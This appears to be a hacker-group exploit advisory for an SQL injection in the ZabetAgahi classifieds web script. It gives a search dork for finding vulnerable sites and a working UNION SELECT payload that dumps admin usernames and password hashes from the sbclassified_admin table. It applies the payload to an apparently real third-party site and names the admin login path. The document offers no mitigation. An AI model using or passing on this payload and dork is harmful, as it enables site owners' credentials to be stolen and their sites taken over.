#(+) Exploit Title: ZabetAgahi SQLInjection Vulnerability
#(+) Author : 3H34N
#(+) E-mail : Ehsan.Empire@Att.Net
#(+) dork : inurl:ZabetAgahiCategory.php?cid=
#(+) Versian : Gold Ver & Othder
#(+) Category : Web Apps [SQl]
#(+) My Home : http://Security-War.com and http://Black-HG.com
#(+) Platform : Tested on: linux-Windows
#(+) Download : http://www.zabet.ir/
____________________________________________________________________
____________________________________________________________________
The security problem in the file "ZabetAgahiCategory.php" has been created.
[~] Vulnerable File :
# [+]http://localhost.com/ZabetAgahiCategory.php?cid=[SQL]
# [+]-44 UNION SELECT 1,concat(admin_name,0x3a,pwd),3,4,5 FROM sbclassified_admin--
:
# [+]http://www.alborz137.ir/ZabetAgahiCategory.php?cid=-44 UNION SELECT 1,concat(admin_name,0x3a,pwd),3,4,5 FROM sbclassified_admin--
Note:login page is here http://localhost.com//AdminZabetAgahi/AdminZabetAgahiHome.php
____________________________________________________________________
____________________________________________________________________
########################################################################
(+)IRANIAN Young HackerZ # Persian Gulf
(+)Black Hat Group Member : Net.Edit0r & DarkCoder & p3nt3st3r & H3x & 3H34N & D3adly #BHG
(+)Sp My Best Friend : Net.Edit0r ^ BlackHat ~ Immortal Boy ~ Mr.Xhat~ Ashkan ..SkilleR.. ~ r3d.s3cur1ty ~ 4min ~ d3v1l.eyes ~ S3Ri0uS and all Friends
(+)Gr33ts to : All Iranian HackerZ
########################################################################
